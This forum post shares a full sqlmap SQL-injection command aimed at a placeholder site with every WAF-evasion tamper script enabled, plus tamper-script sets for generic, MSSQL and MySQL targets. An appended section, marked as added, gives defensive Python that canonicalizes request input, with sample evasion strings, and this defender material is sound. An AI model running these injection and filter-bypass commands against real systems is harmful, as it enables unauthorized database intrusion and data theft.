✨SQLMAP TAMPER SCRIPTS (SQL INJECTION AND WAF BYPASS) ✨

Submitted by INFINITY at 03-11-2021, 09:43 AM


Hey All,
You all prob know about SQLmap’s ability to load tamper script rules to evade filters and WAFs, but what I didn’t know until a few months back was that you can use all of them in one line like so:

Code:
sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1' --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
Quote: These are some targeted tamper sets by DBMS type, good to have handy when testing;

General Tamper testing:

Code:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

Code:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:

Code:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Let’s just ignore the fact that you are sending a million requests though
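
For defenders, the lists above show why signature matching on raw request bytes is fragile. The following is an added example, not part of the original post: it canonicalizes a parameter value before matching, assuming the kinds of rewrites the script names suggest (nested percent-encoding, comments or control characters in place of spaces, mixed case). The function names, the single signature and the sample values are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

MAX_DECODE_ROUNDS = 3  # assumption: depth of nested percent-encoding to unwrap

# Deliberately tiny signature for illustration; real rule sets are far larger.
SIGNATURE = re.compile(r"\bunion\s+(?:all\s+)?select\b")


def canonicalize(value: str) -> str:
    """Reduce a raw parameter value to one canonical form before matching."""
    for _ in range(MAX_DECODE_ROUNDS):           # single and double encoding
        decoded = unquote_plus(value)            # also maps '+' to a space
        if decoded == value:
            break
        value = decoded
    value = value.replace("\x00", "")            # embedded null bytes
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)  # /*!50000KEYWORD*/
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)            # /**/ used as a space
    value = re.sub(r"(?:--|#)[^\n]*\n", " ", value)                 # line comment + newline
    value = re.sub(r"[\x01-\x20\xa0]+", " ", value)                 # blanks, control chars
    return value.lower().strip()                 # mixed-case keywords


def matches(value: str, normalize: bool = True) -> bool:
    """Apply the signature to the raw value or to its canonical form."""
    return bool(SIGNATURE.search(canonicalize(value) if normalize else value))


# Constructed sample values, not taken from any real traffic.
SAMPLES = [
    "1/**/UnIoN/**/SeLeCt/**/1,2",               # comments as spaces, mixed case
    "1%2520union%2520select%25201",              # double percent-encoding
    "1 /*!50000UNION*/ /*!50000SELECT*/ 1",      # versioned comments
    "1%23abc%0AUNION%23xyz%0ASELECT%201",        # line comment + newline as space
    "trade+union+members+select+a+chair",        # benign search text
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"raw={matches(s, False)!s:5} canonical={matches(s)!s:5} {s!r}")
```

Canonicalization only helps when the inspection layer decodes input the same way the application and database do; any difference between the two parsers leaves a gap.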